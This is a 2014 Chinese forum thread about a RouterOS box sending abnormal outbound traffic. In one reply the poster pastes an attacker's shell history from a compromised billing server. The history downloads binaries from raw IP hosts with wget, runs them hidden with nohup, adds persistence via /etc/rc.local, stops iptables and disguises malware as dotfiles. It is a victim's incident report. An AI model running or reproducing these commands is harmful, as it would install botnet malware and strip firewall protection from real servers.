找回密码
 注册

QQ登录

只需一步,快速开始

搜索
查看: 18225|回复: 16

[hack] ros默认路由流量流量异常,外网攻击速度1500m多,谁能有这么大流量

[复制链接]
发表于 2014-5-29 00:30:09 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?注册

×
本帖最后由 qile 于 2014-5-29 00:31 编辑

QQ图片20140529001315.jpg 如题,最近ros的cpu使用率 100%  默认路由pppoe-out1有时候tx流量是1500m 谁有这么大流量攻击
其他没发现异常

是什么造成这个原因,难道内网有回流?
pppoe-out1 禁用后,马上 pppoe-out2流量上去了,也禁用后pppoe-out3的tx流量就上去了
pppoe-out1 拨号后,流量有转到pppoe-out1上了


routeros
发表于 2014-5-29 00:46:05 来自手机 | 显示全部楼层
tx是发送流量,也就是你在攻击别人。torch里应该可以看到你攻击的ip
routeros
回复

使用道具 举报

 楼主| 发表于 2014-5-29 00:58:15 | 显示全部楼层
确实存在在大流量的访问外网ip,但是内外没有找到发送的ip地址
甚至没有发现内网流量超过5m的ip地址
routeros
回复

使用道具 举报

发表于 2014-5-29 01:27:20 | 显示全部楼层
你计费是RM?
routeros
回复

使用道具 举报

 楼主| 发表于 2014-5-29 01:29:31 | 显示全部楼层

是的,计费是rm 和ros集成在一起的?有问题?
routeros
回复

使用道具 举报

发表于 2014-5-29 07:26:41 | 显示全部楼层
ppoe3是 980M   

ether6  是97M。  
routeros
回复

使用道具 举报

发表于 2014-5-29 08:59:14 | 显示全部楼层
给外网来个限速
routeros
回复

使用道具 举报

发表于 2014-5-29 12:40:15 | 显示全部楼层
torch找找,不排除你服务器有问题
routeros
回复

使用道具 举报

发表于 2014-5-29 17:54:34 | 显示全部楼层
在fir fil里做源地址检验
估计是伪造源地址的攻击
routeros
回复

使用道具 举报

发表于 2014-5-29 19:55:33 | 显示全部楼层
本帖最后由 phenlit 于 2014-5-29 19:58 编辑

从图中看到,pppoe-out3应该接到ether6上面。out3外发近985M,网卡97M,网卡6是100M的。ROS往外发数据被堵住了,而进入ROS流量淌不足10M,可以看出是你ROS自发数据包形成的。这个时候你应该检查你的ROS!
routeros
回复

使用道具 举报

发表于 2014-5-29 20:07:02 | 显示全部楼层
至于禁用out1、out2、out3一条线路,接着下一条会跟着送这么大流量,是因为这条流量只往默认路由上跑。这个时候用堵是不能解决问题的,你的CPU都跑到100%了,必须流量源来自哪里!堵的办法很简单,在ip-firewall-filter表output中需要用到的如tcp8291、udp53做accept,再加一条把output所有drop就行!
routeros
回复

使用道具 举报

 楼主| 发表于 2014-5-29 20:43:53 | 显示全部楼层
多谢楼上的解答
肯定是被黑了
决定使用其他版本的去,里面有5月25日下载的文件 拷到本机,win8 系统自带杀毒软件报毒

  1. uname -a
  2. chmod 0777 txma ./txma
  3. /dev/null 2>&1 &
  4. nohup ./txma> /dev/null 2>&1 &
  5. ls
  6. wget http://222.186.15.241:777/2003
  7. chmod 0775 2003
  8. nohup ./2003 > /dev/null 2>&1 &
  9. ifconfig
  10. netstat -antp
  11. netstat -antp
  12. kill -9 8873
  13. chmod 0755 /root/linyx
  14. nohup /root/linyx > /dev/null 2>&1 &
  15. chmod 0755 /root/linix
  16. nohup /root/linix > /dev/null 2>&1 &
  17. echo "cd  /root/">>/etc/rc.local
  18. echo "./fallen&">>/etc/rc.local
  19. echo "/etc/init.d/iptables stop">>/etc/rc.local
  20. chmod 0755 /root/linyx
  21. nohup /root/linyx > /dev/null 2>&1 &
  22. chmod 0755 /root/linix
  23. nohup /root/linix > /dev/null 2>&1 &
  24. ethtool eth0
  25. echo "cd  /root/">>/etc/rc.local
  26. echo "./linyx&">>/etc/rc.local
  27. echo "/etc/init.d/iptables stop">>/etc/rc.local
  28. chmod 0755 /root/.bash_histor
  29. nohup /root/.bash_histor > /dev/null 2>&1 &
  30. chmod 0755 /root/.bash_histor
  31. nohup /root/.bash_histor > /dev/null 2>&1 &
  32. ps -ef
  33. kill -9 14550
  34. kill -9 16751
  35. kill -9 16805
  36.   14542     1  0 May24 ?        00:00:19 /root/linix
  37. kill -9 14542
  38. 9753     1  0 May23 ?        00:05:45 /root/linix
  39. kill -9 9753
  40. ps -ef
  41. kill -9 9748
  42. uname -a
  43. wget http://222.186.24.138:8080/yxhl
  44. chmod 0777 yxhl ./yxhl
  45. /dev/null 2>&1 &
  46. nohup ./yxhl> /dev/null 2>&1 &
  47. ps -ef
  48. pwd
  49. ls
  50. wget http://222.186.40.215:888/kaige
  51. chmod 0755 /root/kaige
  52. nohup /root/kaige > /dev/null 2>&1 &
  53. uname -a
  54. chattr +i kaige
  55. echo "cd  /root/">>/etc/rc.local
  56. echo "./kaige&">>/etc/rc.local
  57. echo "/etc/init.d/iptables stop">>/etc/rc.local
  58. chmod 0755 /root/.gtk-bookmark
  59. nohup /root/.gtk-bookmark > /dev/null 2>&1 &
  60. ethtool eth0
  61. echo "cd  /root/">>/etc/rc.local
  62. echo "./.bash_histor&">>/etc/rc.local
  63. echo "/etc/init.d/iptables stop">>/etc/rc.local
复制代码

只有为神马产生如此大的流量,我也不懂 没时间研究,晚上换了盘,希望没什么问题啦!
routeros
回复

使用道具 举报

发表于 2014-5-30 01:34:47 | 显示全部楼层
应该RM被黑了,和我的情况一样
routeros
回复

使用道具 举报

 楼主| 发表于 2014-5-30 16:34:50 | 显示全部楼层
楼上的 你怎么处理的 端口2222  密码是默认的吗?
routeros
回复

使用道具 举报

发表于 2014-6-1 23:04:40 | 显示全部楼层
你的内网有人搞鬼或者有网卡坏了

你的PPPOE策略没做限速的?
routeros
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|软路由 ( 渝ICP备15001194号-1|渝公网安备 50011602500124号 )

GMT+8, 2024-11-26 18:02 , Processed in 0.067198 second(s), 7 queries , Gzip On, Redis On.

Powered by Discuz! X3.5 Licensed

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表